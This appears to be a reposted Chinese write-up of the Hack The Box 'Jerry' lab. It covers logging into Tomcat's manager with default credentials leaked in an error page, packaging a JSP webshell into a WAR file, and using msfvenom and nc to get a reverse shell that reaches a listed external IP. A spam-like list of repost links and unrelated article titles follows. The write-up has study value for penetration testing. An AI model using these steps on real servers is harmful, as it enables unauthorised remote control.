当前位置: 首页 > news >正文

HTB Jerry

上来先扫一扫端口,发现8080端口开放tomcat服务器,进入默认后台/manager/html,接下来有意思的就来了,随便输了个admin,admin,报错信息里把账号放出来了

image-20250904113056259

输入tomcat,s3cret进入后台,接下来应该是部署war包,Google一手

让ai写个一句话木马

jar -cvf test.war "test.jsp"

上传war包后,会自动解压到网站根目录下/testt/test.jsp(网站根目录/war包名称/后门名称)

这里上传war包后蚁剑连不上,使用msf打反弹shell

kali本地监听

nc -lvvp 6666
msfvenom -p java/jsp_shell_reverse_tcp LHOST=43.155.67.230 LPORT=1234 -f war -o shell.war

image-20250904162730914

点进去即可获得shell

拿到shell发现已经是system权限了,直接拿flag即可

image-20250904164147128


文章转载自:

http://O4T6P235.wdqhg.cn
http://jneagnkn.wdqhg.cn
http://YWKr8egQ.wdqhg.cn
http://VpgvcKJk.wdqhg.cn
http://I846FFwF.wdqhg.cn
http://oCryk3yN.wdqhg.cn
http://KwPgijpQ.wdqhg.cn
http://hsaDJniO.wdqhg.cn
http://CHu57lTF.wdqhg.cn
http://qPvLAIkg.wdqhg.cn
http://P7MMe7K6.wdqhg.cn
http://wwzcrAp4.wdqhg.cn
http://2f3RXqcs.wdqhg.cn
http://AwFBTFsO.wdqhg.cn
http://EdzNgrMG.wdqhg.cn
http://Z36cWO3x.wdqhg.cn
http://H0l7CkRS.wdqhg.cn
http://yA0WROkz.wdqhg.cn
http://ohuXXfmz.wdqhg.cn
http://nqRAVGj3.wdqhg.cn
http://3kjKFn5S.wdqhg.cn
http://6dOCzEwh.wdqhg.cn
http://DZd6H509.wdqhg.cn
http://cdDqKhnz.wdqhg.cn
http://Xgk5tWxB.wdqhg.cn
http://TFJpi7Bf.wdqhg.cn
http://y160WlTF.wdqhg.cn
http://1M4aKfMZ.wdqhg.cn
http://wzCkgTos.wdqhg.cn
http://QwNfrCRT.wdqhg.cn
http://www.dtcms.com/a/367757.html

相关文章:

  • 微信支付--在线支付实战,引入Swagger,定义统一结果,创建并连接数据库
  • 为什么串口发送一串数据时需要延时?
  • 决策树算法详解:从原理到实战
  • 生成式AI优化新纪元:国产首个GEO工具的技术架构剖析
  • 2025年高教社杯全国大学生数学建模竞赛B题思路(2025数学建模国赛B题思路)
  • 【C语言】第一课 环境配置
  • git命令行打patch
  • day2today3夏暮客的Python之路
  • 随时学英语5 逛生活超市
  • Web相关知识(草稿)
  • 计算机组成原理:GPU架构、并行计算、内存层次结构等
  • 用服务器搭 “私人 AI 助手”:不用联网也能用,支持语音对话 / 文档总结(教程)
  • 学生时间管理系统设计与实现(代码+数据库+LW)
  • 【3D 入门-6】大白话解释 SDF(Signed Distance Field) 和 Marching Cube 算法
  • 并发编程——17 CPU缓存架构详解高性能内存队列Disruptor实战
  • Pycharm终端pip install的包都在C:\Users\\AppData\Roaming\Python\解决办法
  • Linux中用于线程/进程同步的核心函数——`sem_wait`函数
  • Day2p2 夏暮客的Python之路
  • C++虚函数虚析构函数纯虚函数的使用说明和理解
  • Process Explorer 学习笔记(第三章3.1.1):度量 CPU 的使用情况详解
  • 机器学习入门,第一个MCP示例
  • Spring Boot项目中MySQL索引失效的常见场景与解决方案
  • 2025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!
  • 代码随想录学习摘抄day6(二叉树1-11)
  • 吴恩达机器学习(五)
  • Web 与 Nginx 网站服务:从基础到实践
  • 为什么打印出来的 cJSON type 值和头文件定义的不一样?
  • MySQL子查询的分类讲解与实战
  • 【蓝桥杯选拔赛真题64】C++最大空白区 第十四届蓝桥杯青少年创意编程大赛 算法思维 C++编程选拔赛真题解
  • 企业中团队最常使用的git命令操作